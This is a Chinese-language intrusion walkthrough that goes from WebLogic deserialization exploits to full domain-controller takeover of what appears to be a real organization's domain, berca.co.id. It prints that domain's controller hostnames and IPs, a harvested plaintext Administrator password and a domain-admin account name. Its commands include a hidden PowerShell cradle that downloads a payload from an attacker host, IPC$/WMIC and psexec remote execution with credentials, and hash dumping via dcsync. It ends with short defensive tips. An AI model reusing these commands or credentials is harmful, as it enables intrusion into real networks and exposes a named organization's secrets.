记一次平平无奇有手就行的幸运域控
字数 1652 2025-08-06 18:08:11

内网渗透实战:从Weblogic漏洞到域控控制

0x00 前言

本文记录了一次完整的内网渗透过程,从外网Weblogic漏洞利用开始,逐步深入内网,最终获取域控权限的全过程。文档将详细分解每个技术环节,包括漏洞利用、权限提升、横向移动和域控控制等关键技术点。

0x01 外网打点

Weblogic漏洞利用

  1. 漏洞识别

    • 目标系统:Weblogic 12
    • 存在漏洞:
      • Wls9-async反序列化漏洞(CVE-2019-2725)
      • XMLDecoder反序列化漏洞(CVE-2017-10271)

  2. 漏洞验证与利用

    • 使用专用漏洞利用工具验证漏洞存在性
    • 成功利用后获得Administrator权限的shell

  3. 初步信息收集

    whoami /all  # 查看当前用户权限
systeminfo    # 查看系统信息
    • 系统版本:Windows Server 2008 R2 Enterprise
    • 域环境:berca.co.id
    • IP地址:192.168.10.22
    • DNS服务器:192.168.15.187、192.168.15.180(初步判断为域控)

  4. 权限维持

    • 上传冰蝎(Behinder)Webshell维持访问
    • 确认无杀毒软件防护

0x02 上线Cobalt Strike

初始访问强化

  1. CS上线
    powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://<attacker_ip>/payload'))"
    • 通过PowerShell一句话上线Cobalt Strike

域信息收集

  1. 基础域信息

    net view /domain              # 查询所有域
net view /domain:ROOT         # 查询ROOT域内所有机器
net group "domain computers" /domain  # 查询所有域成员计算机列表

  2. 域控识别

    net time /domain              # 查询主域(通常为PDC)
net group "Domain Controllers" /domain  # 查看域控列表
nslookup -type=SRV _ldap._tcp  # 通过DNS查询域控
    • 确认域控:
      • 192.168.15.187 adbhpsrv.berca.co.id
      • 192.168.15.180 adbhpsrv02.berca.co.id

  3. 特权账户识别

    net group "domain admins" /domain  # 查询域管列表
net accounts /domain       # 获取域密码策略
nltest /domain_trusts      # 获取域信任关系

凭证获取与提权

  1. 抓取Hash与明文密码

    • 利用Windows Server 2008的特性直接获取明文密码
    • 获取凭证:Administrator/Psft24680!!@@62##

  2. 权限提升

    • 使用SweetPotato(甜土豆)提权工具从Administrator提升至SYSTEM
    • 成功获取SYSTEM权限的会话

0x03 横向移动

IPC$横向移动

  1. 利用条件验证

    net share  # 确认默认共享开启
    • 确认目标机器开放139/445端口

  2. IPC$连接建立

    net use \\192.168.10.23\ipc$ "Psft24680!!@@62##" /user:"Administrator"

  3. 文件传输与执行

    copy C:\Windows\Temp\ma.exe \\192.168.10.23\c$\Windows\Temp\ma.exe
wmic /node:192.168.10.23 /user:Administrator /password:Psft24680!!@@62## process call create "cmd.exe /c C:\Windows\Temp\ma.exe"

SMB Beacon横向移动

  1. SMB Beacon配置

    • 创建SMB Beacon监听器
    • 配置使用端口445

  2. psexec_psh横向

    • 使用Cobalt Strike的psexec_psh模块横向移动
    • 利用获取的凭证使目标主机上线SMB Beacon

  3. 凭证接力

    • 在新上线主机上抓取Hash/明文
    • 发现域管账户:sp_farm
    • 获取域管明文密码

域管权限获取

  1. 直接切换用户

    • 使用CS的"Make Token"功能直接切换为域管用户

  2. 进程注入

    • 查找域管进程
    • 使用CS的"Inject"功能注入到域管进程

域控横向

  1. 目标添加

    • 在CS中添加域控目标(192.168.15.187/180)

  2. 端口扫描

    • 确认域控开放445端口

  3. 横向攻击

    • 使用域管凭证横向移动到域控
    psexec \\adbhpsrv.berca.co.id -u sp_farm -p <password> -h -s cmd.exe

  4. 域Hash导出

    • 使用CS的dcsync或直接导出NTDS.dit获取域内所有用户Hash

0x04 技术要点总结

  1. 漏洞利用

    • Weblogic历史漏洞在内网渗透中仍有较高价值
    • 准确识别中间件版本可提高漏洞利用成功率

  2. 权限提升

    • Windows Server 2008等旧系统容易获取明文密码
    • SweetPotato等工具可有效提权

  3. 横向移动

    • IPC$+WMIC是经典内网横向手法
    • SMB Beacon适合不出网主机控制
    • 多主机凭证接力是扩大战果的关键

  4. 域控控制

    • 域管凭证获取后可通过多种方式控制域控
    • 域Hash导出是内网渗透的终极目标

0x05 防御建议

  1. 及时修补中间件漏洞
  2. 禁用不必要的默认共享
  3. 实施严格的权限分离
  4. 监控异常IPC$连接
  5. 部署EDR检测横向移动行为
  6. 保护域管账户,启用多因素认证

参考资源

  1. Cobalt Strike Wiki
  2. Weblogic漏洞利用工具集
  3. 内网渗透框架:PowerSploit、Empire等
内网渗透实战:从Weblogic漏洞到域控控制 0x00 前言 本文记录了一次完整的内网渗透过程,从外网Weblogic漏洞利用开始,逐步深入内网,最终获取域控权限的全过程。文档将详细分解每个技术环节,包括漏洞利用、权限提升、横向移动和域控控制等关键技术点。 0x01 外网打点 Weblogic漏洞利用 漏洞识别 : 目标系统:Weblogic 12 存在漏洞: Wls9-async反序列化漏洞(CVE-2019-2725) XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞验证与利用 : 使用专用漏洞利用工具验证漏洞存在性 成功利用后获得Administrator权限的shell 初步信息收集 : 系统版本:Windows Server 2008 R2 Enterprise 域环境:berca.co.id IP地址:192.168.10.22 DNS服务器:192.168.15.187、192.168.15.180(初步判断为域控) 权限维持 : 上传冰蝎(Behinder)Webshell维持访问 确认无杀毒软件防护 0x02 上线Cobalt Strike 初始访问强化 CS上线 : 通过PowerShell一句话上线Cobalt Strike 域信息收集 基础域信息 : 域控识别 : 确认域控: 192.168.15.187 adbhpsrv.berca.co.id 192.168.15.180 adbhpsrv02.berca.co.id 特权账户识别 : 凭证获取与提权 抓取Hash与明文密码 : 利用Windows Server 2008的特性直接获取明文密码 获取凭证:Administrator/Psft24680! !@@62## 权限提升 : 使用SweetPotato(甜土豆)提权工具从Administrator提升至SYSTEM 成功获取SYSTEM权限的会话 0x03 横向移动 IPC$横向移动 利用条件验证 : 确认目标机器开放139/445端口 IPC$连接建立 : 文件传输与执行 : SMB Beacon横向移动 SMB Beacon配置 : 创建SMB Beacon监听器 配置使用端口445 psexec_ psh横向 : 使用Cobalt Strike的psexec_ psh模块横向移动 利用获取的凭证使目标主机上线SMB Beacon 凭证接力 : 在新上线主机上抓取Hash/明文 发现域管账户:sp_ farm 获取域管明文密码 域管权限获取 直接切换用户 : 使用CS的"Make Token"功能直接切换为域管用户 进程注入 : 查找域管进程 使用CS的"Inject"功能注入到域管进程 域控横向 目标添加 : 在CS中添加域控目标(192.168.15.187/180) 端口扫描 : 确认域控开放445端口 横向攻击 : 使用域管凭证横向移动到域控 域Hash导出 : 使用CS的dcsync或直接导出NTDS.dit获取域内所有用户Hash 0x04 技术要点总结 漏洞利用 : Weblogic历史漏洞在内网渗透中仍有较高价值 准确识别中间件版本可提高漏洞利用成功率 权限提升 : Windows Server 2008等旧系统容易获取明文密码 SweetPotato等工具可有效提权 横向移动 : IPC$+WMIC是经典内网横向手法 SMB Beacon适合不出网主机控制 多主机凭证接力是扩大战果的关键 域控控制 : 域管凭证获取后可通过多种方式控制域控 域Hash导出是内网渗透的终极目标 0x05 防御建议 及时修补中间件漏洞 禁用不必要的默认共享 实施严格的权限分离 监控异常IPC$连接 部署EDR检测横向移动行为 保护域管账户,启用多因素认证 参考资源 Cobalt Strike Wiki Weblogic漏洞利用工具集 内网渗透框架:PowerSploit、Empire等